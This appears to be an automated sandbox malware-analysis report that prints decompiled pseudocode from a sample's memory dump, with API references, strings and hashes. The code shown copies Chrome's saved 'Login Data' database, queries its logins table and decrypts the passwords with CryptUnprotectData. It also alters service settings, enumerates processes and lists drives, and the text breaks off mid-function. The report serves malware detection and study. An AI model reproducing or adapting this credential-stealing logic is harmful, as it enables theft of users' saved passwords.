								E004058FB(_v52);
							}
							_t143 =  *((intOrPtr*)(_t263 + 0x54))(_v8, 5);
							__eflags = _t143;
							if(_t143 > 0) {
								_t171 =  *((intOrPtr*)(_t263 + 0x54))(_v8, 5);
								_v84 = _t171;
								_t172 =  *((intOrPtr*)(_t263 + 0x4c))(_v8, 5);
								_t268 = _t268 + 0x10;
								_v80 = _t172;
								_t175 =  &_v84;
								__imp__CryptUnprotectData(_t175, 0, 0, 0, 0, _t264,  &_v76);
								__eflags = _t175;
								if(_t175 != 0) {
									E00402D5A( &_v68, _v72, _v76);
									LocalFree(_v72);
									_t191 = _v64;
								}
							}
							_t144 = E00402E52( &_v16);
							__eflags = _t144;
							if(_t144 > 0) {
								L17:
								_v100 = 0;
								_v96 = 0;
								_v92 = 0;
								__eflags = E00402E52( &_v24);
								if(__eflags > 0) {
									E004031FD( &_v100, E00402E63( &_v24, __eflags,  &_v28));
									E004058FB(_v28);
									_t78 =  &_v28;
									 *_t78 = _v28 & 0x00000000;
									__eflags =  *_t78;
								}
								__eflags = E00402E52( &_v16);
								if(__eflags > 0) {
									E004031FD( &_v96, E00402E63( &_v16, __eflags,  &_v32));
									E004058FB(_v32);
									_t85 =  &_v32;
									 *_t85 = _v32 & 0x00000000;
									__eflags =  *_t85;
								}
								__eflags = _t191;
								if(_t191 != 0) {
									E004031FD( &_v92, E00402E63(E00402CF2( &_v68,  &_v56), __eflags,  &_v36));
									E004058FB(_v36);
									_t93 =  &_v36;
									 *_t93 = _v36 & 0x00000000;
									__eflags =  *_t93;
									E004058FB(_v56);
								}
								_t268 = _t268 - 0x10;
								_v88 = _t264;
								E00401ED8(_t268,  &_v100);
								E00401F0E(_t263);
								E0040138F( &_v100);
								goto L24;
							} else {
								__eflags = _t191;
								if(_t191 == 0) {
									L24:
									E004058FB(_v60);
									E004058FB(_v24);
									E004058FB(_v16);
									E00402DFF( &_v68);
									_t135 =  *((intOrPtr*)(_t263 + 0x3c))(_v8);
									continue;
								}
								goto L17;
							}
						}
						 *((intOrPtr*)(_t263 + 0x58))(_v8);
						 *((intOrPtr*)(_t263 + 0x2c))();
						E004033F3(_t268,  &_v12);
						E0040DA33(_v40);
						L5:
						E004058FB(_v20);
						E004058FB(_v12);
						E004058FB(_v44);
						return _t264;
					}
					L3:
					E004033F3(_t268,  &_v12);
					E0040DA33(_t208);
					goto L4;
				}
			}

0x0040adbb
0x0040adc4
0x0040adce
0x0040add5
0x0040add9
0x0040ade6
0x0040aded
0x0040adfa
0x0040ae02
0x0040ae0f
0x0040ae16
0x0040ae1a
0x0040ae27
0x0040ae37
0x0040ae93
0x0040ae93
0x00000000
0x0040ae4b
0x0040ae52
0x0040ae5e
0x0040ae6d
0x0040ae70
0x0040ae73
0x0040ae78
0x0040ae7f
0x0040aec2
0x0040aec5
0x0040aec8
0x0040aeca
0x00000000
0x00000000
0x0040aecf
0x0040aed4
0x0040b0c6
0x0040b0c7
0x0040b0ca
0x00000000
0x00000000
0x0040aeda
0x0040aede
0x0040aee2
0x0040aee5
0x0040aeee
0x0040aefa
0x0040af0c
0x0040af16
0x0040af1b
0x0040af1d
0x0040af36
0x0040af3e
0x0040af3e
0x0040af48
0x0040af4d
0x0040af4f
0x0040af68
0x0040af70
0x0040af70
0x0040af7a
0x0040af7f
0x0040af81
0x0040af88
0x0040af90
0x0040af93
0x0040af96
0x0040af99
0x0040afa7
0x0040afab
0x0040afb1
0x0040afb3
0x0040afbe
0x0040afc6
0x0040afcc
0x0040afcc
0x0040afb3
0x0040afd2
0x0040afd7
0x0040afd9
0x0040afe3
0x0040afe8
0x0040afeb
0x0040afee
0x0040aff6
0x0040aff8
0x0040b00a
0x0040b012
0x0040b017
0x0040b017
0x0040b017
0x0040b017
0x0040b023
0x0040b025
0x0040b037
0x0040b03f
0x0040b044
0x0040b044
0x0040b044
0x0040b044
0x0040b048
0x0040b04a
0x0040b067
0x0040b06f
0x0040b077
0x0040b077
0x0040b077
0x0040b07b
0x0040b07b
0x0040b080
0x0040b083
0x0040b08c
0x0040b093
0x0040b09b
0x00000000
0x0040afdb
0x0040afdb
0x0040afdd
0x0040b0a0
0x0040b0a3
0x0040b0ab
0x0040b0b3
0x0040b0bb
0x0040b0c3
0x00000000
0x0040b0c3
0x00000000
0x0040afdd
0x0040afd9
0x0040b0d3
0x0040b0d9
0x0040b0e3
0x0040b0e8
0x0040ae95
0x0040ae98
0x0040aea0
0x0040aea8
0x0040aeb3
0x0040aeb3
0x0040ae81
0x0040ae88
0x0040ae8d
0x00000000
0x0040ae92

APIs

Part of subcall function 00403185: lstrlenA.KERNEL32(?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 0040318E
Part of subcall function 00403185: lstrlenA.KERNEL32(?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 0040319B
Part of subcall function 00403185: lstrcpyA.KERNEL32(00000000,?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 004031AE

Part of subcall function 0040D51C: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040D54D

Part of subcall function 004030FB: lstrcatW.KERNEL32 ref: 0040312B

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

PathFileExistsW.SHLWAPI(?), ref: 0040AE2F
CopyFileW.KERNEL32 ref: 0040AE41

Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222

Part of subcall function 0040331A: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,004049AA,?), ref: 00403347
Part of subcall function 0040331A: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,004049AA,?,?,?,?,?), ref: 00403372

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040AFAB
LocalFree.KERNEL32(?,?,?), ref: 0040AFC6

Part of subcall function 004033F3: lstrcpyW.KERNEL32(00000000,?), ref: 0040341D

Part of subcall function 0040DA33: DeleteFileW.KERNEL32(?,?,?,00402995), ref: 0040DA3A

Strings

SELECT * FROM logins, xrefs: 0040ADC9
\Google\Chrome\User Data\Default\Login Data, xrefs: 0040AE1F
.tmp, xrefs: 0040AE07

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$ByteCharFreeMultiPathWidelstrlen$CopyCryptDataDeleteExistsFolderLocalSpecialUnprotectVirtuallstrcat
String ID: .tmp$SELECT * FROM logins$\Google\Chrome\User Data\Default\Login Data
API String ID: 1985407002-2809225024
Opcode ID: cedff8242738c2fd903e970e1aa82305de2d890a98dd9e63a787c111a7fb51a0
Instruction ID: 2ea2c2b35a31d67df08eb375238b82d3640468ae8524dd67abbef01722a5ad02
Opcode Fuzzy Hash: cedff8242738c2fd903e970e1aa82305de2d890a98dd9e63a787c111a7fb51a0
Instruction Fuzzy Hash: ACA13C32900209ABDB05EBA1DD56AEEBB79FF08315F10413EF402B61E1EF785A15DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B5E1 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B5E1(short** _a4, int _a8) {
				void* _t3;
				short* _t9;
				void* _t12;
				short* _t14;
				void* _t16;

				_t14 = 0;
				_t3 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t16 = _t3;
				if(_t16 != 0) {
					_t12 = OpenServiceW(_t16,  *_a4, 2);
					if(_t12 != 0) {
						if(ChangeServiceConfigW(_t12, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) != 0) {
							_t14 = 1;
						}
						CloseServiceHandle(_t16);
						CloseServiceHandle(_t12);
						_t9 = _t14;
					} else {
						CloseServiceHandle(_t16);
						_t9 = 0;
					}
					return _t9;
				}
				return _t3;
			}

0x0040b5ed
0x0040b5f0
0x0040b5f6
0x0040b5fa
0x0040b60b
0x0040b60f
0x0040b633
0x0040b637
0x0040b637
0x0040b63f
0x0040b642
0x0040b644
0x0040b611
0x0040b612
0x0040b618
0x0040b618
0x00000000
0x0040b646
0x0040b64a

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040B5F0
OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 0040B605
CloseServiceHandle.ADVAPI32(00000000), ref: 0040B612
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040B62B
CloseServiceHandle.ADVAPI32(00000000), ref: 0040B63F
CloseServiceHandle.ADVAPI32(00000000), ref: 0040B642

Strings

ServicesActive, xrefs: 0040B5E8

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID: ServicesActive
API String ID: 493672254-3071072050
Opcode ID: 01572796ecdb44aff4ad89a34928dabba4fab4e822c40fd02998138206f5992f
Instruction ID: eee316b07326a5f2b866cb1d03247ed7dbe559b9ae32600452f4591403dade88
Opcode Fuzzy Hash: 01572796ecdb44aff4ad89a34928dabba4fab4e822c40fd02998138206f5992f
Instruction Fuzzy Hash: 3EF0C23120422577D6211B269C48E9B3F5DEBCA7707108732FA21E62D0CBB58811C7FD

Uniqueness

Uniqueness Score: -1.00%

Function 0040E80F Relevance: 12.2, APIs: 8, Instructions: 164
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040E80F(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				int _v36;
				intOrPtr _v40;
				int _v44;
				char _v568;
				long _v596;
				char _v600;
				void* _v604;
				char _v1644;
				intOrPtr _t49;
				int _t54;
				int _t58;
				int _t74;
				int _t78;
				int _t90;
				void* _t92;
				void* _t113;
				void* _t114;
				void* _t116;
				void* _t118;
				signed int _t120;
				void* _t121;
				signed int _t123;
				void* _t124;
				intOrPtr* _t125;
				void* _t126;

				_t126 = __eflags;
				_t113 = __edx;
				_t92 = __ecx;
				E00401052( &_v600, 0, 0x228);
				_t125 = _t124 + 0xc;
				_v604 = 0x22c;
				_v36 = 0;
				_t49 = 5;
				_v32 = _t49;
				_v40 = _t49;
				E00401683( &_v44, _t126);
				_t114 = CreateToolhelp32Snapshot(2, 0);
				if(_t114 == 0xffffffff) {
					L14:
					E004012BA(_t92, __eflags,  &_v44);
					_t54 = _v44;
					__eflags = _t54;
					if(_t54 != 0) {
						_t120 =  *(_t54 - 4);
						_t116 = _t120 * 0xc + _t54;
						__eflags = _t120;
						if(_t120 != 0) {
							do {
								_t116 = _t116 - 0xc;
								E004013B6(_t116);
								_t120 = _t120 - 1;
								__eflags = _t120;
							} while (_t120 != 0);
						}
					}
				} else {
					_push( &_v604);
					_t58 = Process32FirstW(_t114);
					_t128 = _t58;
					if(_t58 != 0) {
						do {
							_v16 = _v596;
							_v12 = 0;
							_v8 = 0;
							E004030C5( &_v12, _t113,  &_v568);
							_t121 = OpenProcess(0x1000, 0, _v596);
							__eflags = _t121 - 0xffffffff;
							if(_t121 == 0xffffffff) {
								E004031FD( &_v8, E004033AB( &_v28, "-"));
								E004058FB(_v28);
								_t34 =  &_v28;
								 *_t34 = _v28 & 0x00000000;
								__eflags =  *_t34;
							} else {
								E00401052( &_v1644, 0, 0x410);
								_t125 = _t125 + 0xc;
								_t78 =  &_v1644;
								__imp__GetModuleFileNameExW(_t121, 0, _t78, 0x208);
								__eflags = _t78;
								if(_t78 == 0) {
									E004031FD( &_v8, E004033AB( &_v24, "-"));
									E004058FB(_v24);
									_t29 =  &_v24;
									 *_t29 = _v24 & 0x00000000;
									__eflags =  *_t29;
								} else {
									E004031FD( &_v8, E004033AB( &_v20,  &_v1644));
									E004058FB(_v20);
									_v20 = _v20 & 0x00000000;
								}
								CloseHandle(_t121);
							}
							_t125 = _t125 - 0xc;
							_t122 = _t125;
							 *_t125 = _v16;
							E004033F3(_t122 + 4,  &_v12);
							E004033F3(_t122 + 8,  &_v8);
							E00401560( &_v44);
							E004013B6( &_v16);
							_t74 = Process32NextW(_t114,  &_v604);
							_push(0);
							_pop(0);
							__eflags = _t74;
						} while (__eflags != 0);
						CloseHandle(_t114);
						goto L14;
					} else {
						CloseHandle(_t114);
						E004012BA(_t92, _t128,  &_v44);
						_t90 = _v44;
						if(_t90 != 0) {
							_t123 =  *(_t90 - 4);
							_t118 = _t123 * 0xc + _t90;
							if(_t123 != 0) {
								do {
									_t118 = _t118 - 0xc;
									E004013B6(_t118);
									_t123 = _t123 - 1;
								} while (_t123 != 0);
							}
						}
					}
				}
				return _t92;
			}

0x0040e80f
0x0040e80f
0x0040e82a
0x0040e82c
0x0040e831
0x0040e834
0x0040e841
0x0040e846
0x0040e847
0x0040e84a
0x0040e84d
0x0040e85b
0x0040e860
0x0040e9e8
0x0040e9ee
0x0040e9f3
0x0040e9f6
0x0040e9f8
0x0040e9fa
0x0040ea00
0x0040ea02
0x0040ea04
0x0040ea06
0x0040ea06
0x0040ea0b
0x0040ea10
0x0040ea10
0x0040ea10
0x0040ea06
0x0040ea04
0x0040e866
0x0040e86c
0x0040e86e
0x0040e874
0x0040e876
0x0040e8b9
0x0040e8c2
0x0040e8cc
0x0040e8cf
0x0040e8d2
0x0040e8e9
0x0040e8eb
0x0040e8ee
0x0040e985
0x0040e98d
0x0040e992
0x0040e992
0x0040e992
0x0040e8f4
0x0040e902
0x0040e907
0x0040e90a
0x0040e919
0x0040e91f
0x0040e921
0x0040e95a
0x0040e962
0x0040e967
0x0040e967
0x0040e967
0x0040e923
0x0040e936
0x0040e93e
0x0040e943
0x0040e943
0x0040e96c
0x0040e96c
0x0040e999
0x0040e99c
0x0040e99e
0x0040e9a7
0x0040e9b3
0x0040e9bb
0x0040e9c3
0x0040e9d0
0x0040e9d6
0x0040e9d8
0x0040e9d9
0x0040e9d9
0x0040e9e2
0x00000000
0x0040e878
0x0040e879
0x0040e885
0x0040e88a
0x0040e88f
0x0040e895
0x0040e89b
0x0040e89f
0x0040e8a5
0x0040e8a5
0x0040e8aa
0x0040e8af
0x0040e8af
0x0040e8b4
0x0040e89f
0x0040e88f
0x0040e876
0x0040ea1b

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E855
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E86E
CloseHandle.KERNEL32(00000000), ref: 0040E879

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

OpenProcess.KERNEL32(00001000,00000000,?,?), ref: 0040E8E3
GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 0040E919
CloseHandle.KERNEL32(00000000), ref: 0040E96C
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E9D0
CloseHandle.KERNEL32(00000000), ref: 0040E9E2

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CloseHandle$Process32lstrcpylstrlen$CreateFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32Virtual
String ID:
API String ID: 3514491001-0
Opcode ID: eeb2d8d736913b17ae9c4b89f93247d5dffb713e1eafd525665515e51b53e459
Instruction ID: d6a070f34a12a1d34ccb490787e25848055c2920b169500faa4818559f6cf036
Opcode Fuzzy Hash: eeb2d8d736913b17ae9c4b89f93247d5dffb713e1eafd525665515e51b53e459
Instruction Fuzzy Hash: 8751B272E00118ABCB10EBA5DD8AEEEBB78AF84315F00057AE505B31D0DB785B548B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F7CD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F7CD(void* __ecx, void* __eflags) {
				char _v264;
				intOrPtr _v292;
				void* _v300;
				int _t11;
				void* _t22;

				_t22 = CreateToolhelp32Snapshot(2, 0);
				E00401052( &_v300, 0, 0x128);
				_v300 = 0x128;
				_t11 = Process32First(_t22,  &_v300);
				while(_t11 != 0) {
					if(E004010E6( &_v264, "explorer.exe") == 0) {
						return _v292;
					}
					_t11 = Process32Next(_t22,  &_v300);
				}
				CloseHandle(_t22);
				return 0;
			}

0x0040f7e7
0x0040f7f3
0x0040f7fb
0x0040f809
0x0040f836
0x0040f826
0x00000000
0x0040f847
0x0040f830
0x0040f830
0x0040f83b
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F7DC
Process32First.KERNEL32(00000000,?), ref: 0040F809
Process32Next.KERNEL32(00000000,?), ref: 0040F830
CloseHandle.KERNEL32(00000000), ref: 0040F83B

Strings

explorer.exe, xrefs: 0040F817

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: explorer.exe
API String ID: 420147892-3187896405
Opcode ID: 8d17e075dee9889557f4d992a22cfadbe3ba1e4f6a297f731f5af46e549355d6
Instruction ID: 2b204fbf3d2e274149eb59f35319977f58e1319f1570237e8f092e315a6edf2e
Opcode Fuzzy Hash: 8d17e075dee9889557f4d992a22cfadbe3ba1e4f6a297f731f5af46e549355d6
Instruction Fuzzy Hash: EC01D672901124BBDB30A760AC49FDA37BCDB45310F004076FA05F11C0EB78DA948A69

Uniqueness

Uniqueness Score: -1.00%

Function 0040D56A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040D56A() {
				intOrPtr _v6;
				signed int _v12;
				intOrPtr _v272;
				intOrPtr _v280;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t33;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t53;
				intOrPtr _t62;
				_Unknown_base(*)()* _t69;
				void* _t71;

				_v288 = 0x11c;
				_t33 = LoadLibraryA("ntdll.dll");
				if(_t33 == 0) {
					L3:
					_t71 = 2;
					if(_v272 != _t71) {
						goto L43;
					} else {
						_t35 = _v6;
						if(_t35 != 1) {
							if(_t35 == 2 || _t35 == 3) {
								if(_v284 != 5) {
									if(_v284 != 6) {
										if(_v284 != 0xa || _v280 != 0) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x2710;
										}
									} else {
										_t38 = _v280;
										if(_t38 != 0) {
											if(_t38 != 1) {
												if(_t38 != _t71) {
													if(_t38 != 3) {
														goto L43;
													} else {
														return (_v12 & 0x0000ffff) + 0x189c;
													}
												} else {
													return (_v12 & 0x0000ffff) + 0x1838;
												}
											} else {
												return (_v12 & 0x0000ffff) + 0x17d4;
											}
										} else {
											return (_v12 & 0x0000ffff) + 0x1770;
										}
									}
								} else {
									if(_v280 != 1) {
										if(_v280 != _t71) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x1450;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x13ec;
									}
								}
							} else {
								goto L43;
							}
						} else {
							if(_v284 != 5) {
								if(_v284 != 6) {
									if(_v284 != 0xa || _v280 != 0) {
										goto L43;
									} else {
										return (_v12 & 0x0000ffff) + 0x3e8;
									}
								} else {
									_t53 = _v280;
									if(_t53 != 0) {
										if(_t53 != 1) {
											if(_t53 != _t71) {
												if(_t53 != 3) {
													goto L43;
												} else {
													return (_v12 & 0x0000ffff) + 0x276;
												}
											} else {
												return (_v12 & 0x0000ffff) + 0x26c;
											}
										} else {
											return (_v12 & 0x0000ffff) + 0x262;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x258;
									}
								}
							} else {
								_t62 = _v280;
								if(_t62 != 0) {
									if(_t62 != 1) {
										if(_t62 != _t71) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x208;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x1fe;
									}
								} else {
									return (_v12 & 0x0000ffff) + 0x1f4;
								}
							}
						}
					}
				} else {
					_t69 = GetProcAddress(_t33, "RtlGetVersion");
					if(_t69 == 0) {
						L43:
						return 0;
					} else {
						 *_t69( &_v288);
						goto L3;
					}
				}
			}

0x0040d578
0x0040d582
0x0040d58a
0x0040d5a9
0x0040d5ab
0x0040d5b2
0x00000000
0x0040d5b8
0x0040d5b8
0x0040d5bd
0x0040d67c
0x0040d68d
0x0040d6bd
0x0040d70a
0x00000000
0x0040d715
0x0040d71f
0x0040d71f
0x0040d6bf
0x0040d6bf
0x0040d6c7
0x0040d6d7
0x0040d6e6
0x0040d6f6
0x00000000
0x0040d6f8
0x0040d702
0x0040d702
0x0040d6e8
0x0040d6f2
0x0040d6f2
0x0040d6d9
0x0040d6e3
0x0040d6e3
0x0040d6c9
0x0040d6d3
0x0040d6d3
0x0040d6c7
0x0040d68f
0x0040d696
0x0040d6a9
0x00000000
0x0040d6ab
0x0040d6b5
0x0040d6b5
0x0040d698
0x0040d6a2
0x0040d6a2
0x0040d696
0x00000000
0x00000000
0x00000000
0x0040d5c3
0x0040d5ca
0x0040d60b
0x0040d65c
0x00000000
0x0040d66f
0x0040d679
0x0040d679
0x0040d60d
0x0040d60d
0x0040d615
0x0040d625
0x0040d634
0x0040d644
0x00000000
0x0040d64a
0x0040d654
0x0040d654
0x0040d636
0x0040d640
0x0040d640
0x0040d627
0x0040d631
0x0040d631
0x0040d617
0x0040d621
0x0040d621
0x0040d615
0x0040d5cc
0x0040d5cc
0x0040d5d4
0x0040d5e4
0x0040d5f3
0x00000000
0x0040d5f9
0x0040d603
0x0040d603
0x0040d5e6
0x0040d5f0
0x0040d5f0
0x0040d5d6
0x0040d5e0
0x0040d5e0
0x0040d5d4
0x0040d5ca
0x0040d5bd
0x0040d58c
0x0040d592
0x0040d59a
0x0040d720
0x0040d723
0x0040d5a0
0x0040d5a7
0x00000000
0x0040d5a7
0x0040d59a

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040D582
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040D592

Strings

ntdll.dll, xrefs: 0040D573
RtlGetVersion, xrefs: 0040D58C

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 2574300362-1489217083
Opcode ID: a6414c01c92aabc54e3dac894ac6b41c5d20304dc033d076b823929ad4d20eec
Instruction ID: 964498e7b8206f6121ba622e0b87865c0d2dc345f445b9a64492767920e746fb
Opcode Fuzzy Hash: a6414c01c92aabc54e3dac894ac6b41c5d20304dc033d076b823929ad4d20eec
Instruction Fuzzy Hash: AD412F70D0012CA6DF248B95D8063FE76B4AB5574DF0408F6E549F52C1E67CCED8CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040DB53(char __ecx, void* __eflags) {
				void* _v8;
				char _v12;
				intOrPtr _v16;
				int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				WCHAR* _t33;
				intOrPtr _t34;
				int _t44;
				WCHAR* _t54;
				signed int _t72;
				char _t74;
				int _t75;
				long _t76;
				WCHAR* _t77;
				void* _t78;
				void* _t79;

				_t74 = __ecx;
				_v12 = __ecx;
				_t33 = E004059A9(0x208);
				_v32 = _v32 & 0x00000000;
				_t54 = _t33;
				_t34 = 5;
				_v28 = _t34;
				_v36 = _t34;
				E00401996( &_v40, __eflags);
				_t76 = GetLogicalDriveStringsW(0x104, _t54);
				_t81 = _t76 - 0x104;
				if(_t76 > 0x104) {
					_t72 = 2;
					_t54 = E004059A9( ~(0 | _t81 > 0x00000000) | _t36 * _t72);
					GetLogicalDriveStringsW(_t76, _t54);
				}
				_t77 = 0;
				if( *_t54 != 0) {
					do {
						_v24 = _t77;
						E004031FD( &_v24, E004033AB( &_v8, _t54));
						E004058FB(_v8);
						_v8 = _t77;
						_t44 = GetDriveTypeW(_v24);
						_t79 = _t79 - 0xc;
						_t75 = _t44;
						_t78 = _t79;
						_v20 = _t75;
						E004033F3(_t78,  &_v24);
						 *(_t78 + 4) = _t75;
						 *((intOrPtr*)(_t78 + 8)) = _v16;
						E004018A3( &_v40);
						_t54 =  &(( &(_t54[E00403027( &_v24)]))[1]);
						E004058FB(_v24);
						_t77 = 0;
						_v24 = 0;
						_t84 =  *_t54;
					} while ( *_t54 != 0);
					_t30 =  &_v12; // 0x402a6b
					_t74 =  *_t30;
				}
				E00401348(_t74, _t84,  &_v40);
				_t60 = _v40;
				if(_v40 != 0) {
					E00401AA0(_t60, _t60);
				}
				return _t74;
			}

0x0040db5c
0x0040db63
0x0040db66
0x0040db6b
0x0040db74
0x0040db76
0x0040db77
0x0040db7a
0x0040db7d
0x0040db8e
0x0040db90
0x0040db96
0x0040db9c
0x0040dbab
0x0040dbaf
0x0040dbaf
0x0040dbb5
0x0040dbba
0x0040dbbc
0x0040dbc0
0x0040dbcc
0x0040dbd4
0x0040dbdc
0x0040dbdf
0x0040dbe5
0x0040dbe8
0x0040dbea
0x0040dbec
0x0040dbf5
0x0040dc00
0x0040dc03
0x0040dc06
0x0040dc19
0x0040dc1c
0x0040dc21
0x0040dc23
0x0040dc26
0x0040dc26
0x0040dc2b
0x0040dc2b
0x0040dc2b
0x0040dc34
0x0040dc39
0x0040dc3e
0x0040dc41
0x0040dc41
0x0040dc4c

APIs

Part of subcall function 004059A9: GetProcessHeap.KERNEL32(00000000,000000F4,0040DF9F,?,?,00000000,004054B9,?,?,00000000), ref: 004059AC
Part of subcall function 004059A9: HeapAlloc.KERNEL32(00000000,?,00000000,004054B9,?,?,00000000), ref: 004059B3

GetLogicalDriveStringsW.KERNEL32(00000104,00000000), ref: 0040DB88
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0040DBAF
GetDriveTypeW.KERNEL32(?,00000000,00000000), ref: 0040DBDF

Strings

k*@, xrefs: 0040DC2B

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Drive$HeapLogicalStrings$AllocProcessType
String ID: k*@
API String ID: 2408535517-2725539947
Opcode ID: 25bde1fc645dd23c9f61706139190765254cfcef7ea2d7fa198aa439140ef896
Instruction ID: 98d02b3701341341695fb94b7a0308b04c6fe68b2b5b36501cba12d719c14525
Opcode Fuzzy Hash: 25bde1fc645dd23c9f61706139190765254cfcef7ea2d7fa198aa439140ef896
Instruction Fuzzy Hash: DD318F71E002199BCB14EFE5C9869EFBBB8EF48355F10407EE502B7291DA785E04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00409150 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
memoryencryptionstringCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E00409150(intOrPtr __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v8216;
				char* _t24;
				signed int _t27;
				WCHAR* _t29;
				intOrPtr _t30;
				signed int* _t31;
				intOrPtr _t32;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t38;
				void* _t39;

				_t30 = __ecx;
				E00401130(0x2014, __ecx);
				_t36 = _a4;
				_t29 = __edx;
				_v8 = _t30;
				_t3 = _t36 - 1; // -1
				_t34 = GlobalAlloc(0x40, _t3);
				_t38 = 1;
				if(_t36 > 1) {
					_t32 = _v8;
					do {
						 *((char*)(_t34 + _t38 - 1)) =  *((intOrPtr*)(_t38 + _t32));
						_t38 = _t38 + 1;
					} while (_t38 < _t36);
				}
				_t8 = _t36 - 1; // -1
				_v12 = _t34;
				_v16 = _t8;
				_t39 = 0;
				_t24 =  &_v16;
				__imp__CryptUnprotectData(_t24, 0, 0, 0, 0, 0,  &_v24);
				if(_t24 == 0) {
					_push(L"Could not decrypt");
				} else {
					if(_t36 > 0) {
						_t35 = _v20;
						_t31 =  &_v8216;
						do {
							_t27 =  *(_t35 + _t39) & 0x000000ff;
							_t39 = _t39 + 2;
							 *_t31 = _t27;
